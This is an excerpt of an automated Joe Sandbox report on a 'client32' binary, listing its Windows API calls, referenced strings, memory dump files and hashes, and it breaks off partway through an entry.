                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25f72b9f5038b89ec4964a80f4b93fd200d2d05303f84e90b96401370639f8e8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16F01272A00628AFD754DFA9E944F97B7E8EB49711F40842AF99597640C770F810CFA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetTouchInputInfo), ref: 110357C4
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110357ED
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: GetTouchInputInfo
                                                                                                                                                                                                    • API String ID: 199729137-2645705246
                                                                                                                                                                                                    • Opcode ID: 10c41ff3f6d42deed21e7e2a21c2cb8f3ae54b01ca1ecf88037c24ed306f470b
                                                                                                                                                                                                    • Instruction ID: 6c704fc084d9c209ada407b9a0c733f7d943ecdbd0845790b09f7fc4fb0b7951
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10c41ff3f6d42deed21e7e2a21c2cb8f3ae54b01ca1ecf88037c24ed306f470b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6F08276A11728AFD314CF98E844F9BB7E8EF4CB11F00491AF949D7240C671E810CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeferWindowPos.USER32(8B000E80,00000000,F8E85BC0,33CD335E,?,00000000,33CD335E,11076276), ref: 11075563
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11075536
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11075531
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DeferErrorExitLastMessageProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 889670253-2830328467
                                                                                                                                                                                                    • Opcode ID: 60ec77db6c4667eb89bd7fa16fa81bbec39534bd321d44308b88f3494834766c
                                                                                                                                                                                                    • Instruction ID: 0f53da842d51b2bc1a575ce598d94f232e02cc1422780aacd45dca11e73889ea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60ec77db6c4667eb89bd7fa16fa81bbec39534bd321d44308b88f3494834766c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF01CB661021DAFC704CE89DC80EEBB3EDEB9C754F008119FA19D3250D630E950CBA4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 11017014
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11017039
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: QueueUserWorkItem
                                                                                                                                                                                                    • API String ID: 199729137-2469634949
                                                                                                                                                                                                    • Opcode ID: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
                                                                                                                                                                                                    • Instruction ID: 351e0e434b9127e3d5833c8cdc34dd988e3f21fb5a429389f6b6525592fa6d03
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF08C32A10328AFC310DFA8D844E9BB7A8FB48721F40842AF94087600C630F8008BA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 11031034
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11031055
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: ProcessIdToSessionId
                                                                                                                                                                                                    • API String ID: 199729137-2164408197
                                                                                                                                                                                                    • Opcode ID: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
                                                                                                                                                                                                    • Instruction ID: c15e5fa19e0f6f6798f22c3181eac8c4efc8dc53165636b7ac94afd6ac4f5e0b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9E06532A552245FC310DFB5D844E56F7E8EB58762F00C52AF95997200C670A801CFA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowTextLengthA.USER32(7658FC40), ref: 11157303
                                                                                                                                                                                                    • GetWindowTextA.USER32(7658FC40,00000000,00000001), ref: 1115731D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: TextWindow$Length
                                                                                                                                                                                                    • String ID: ...
                                                                                                                                                                                                    • API String ID: 1006428111-1685331755
                                                                                                                                                                                                    • Opcode ID: 617f2b8ce24be5daefdab75bb62433564d404e2d5d672db981e06d1a518aa2ce
                                                                                                                                                                                                    • Instruction ID: 3e974f6f281fad8de38b3af03667cb2bd2dd56defaaa0821f91d93156a413d34
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 617f2b8ce24be5daefdab75bb62433564d404e2d5d672db981e06d1a518aa2ce
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DE02B36D046635FD281463C9C48DCBFB9DEF82228B458470F595D3201DA20D40BC7E0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(1117B47B,InternetCloseHandle), ref: 11027524
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,110297FB,1117B47B), ref: 11027541
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: InternetCloseHandle
                                                                                                                                                                                                    • API String ID: 199729137-3843628324
                                                                                                                                                                                                    • Opcode ID: 1b6e93195561b6ae7fac2394f1119c484194f36d55897542f86653d00150cad3
                                                                                                                                                                                                    • Instruction ID: 0efa5e4b185ac2da0920bc638d9d3d9410d8270d4334fbfed3ee5fbf9e412b31
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b6e93195561b6ae7fac2394f1119c484194f36d55897542f86653d00150cad3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20E09272A007345BC320DFA9E844A46F7E8DB24765F40453BEA4197200C670E4448BE0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CloseTouchInputHandle), ref: 11035784
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110357A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: CloseTouchInputHandle
                                                                                                                                                                                                    • API String ID: 199729137-251360538
                                                                                                                                                                                                    • Opcode ID: c5c51cc3416df1740feb99d5a79384ace3f2b2c8a6160679b09382d954a17126
                                                                                                                                                                                                    • Instruction ID: 5579ed7c47e3ef80365c35dbc64790a79754191371e6850b1d9de20976132785
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5c51cc3416df1740feb99d5a79384ace3f2b2c8a6160679b09382d954a17126
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1E09232A506259FC315DFA9E848A46F7D8EF54722F00843AE65597100C631A4408BA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001096
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2046328329-2830328467
                                                                                                                                                                                                    • Opcode ID: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
                                                                                                                                                                                                    • Instruction ID: d6c174be7095a88acf08c8c7035f1bfcc606cf11c581344454f7ad96a18f94da
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68E01AB6610269AFD714DE85EC80EE7B3ACAB48794F008429FA5997240D6B0E95087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001056
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
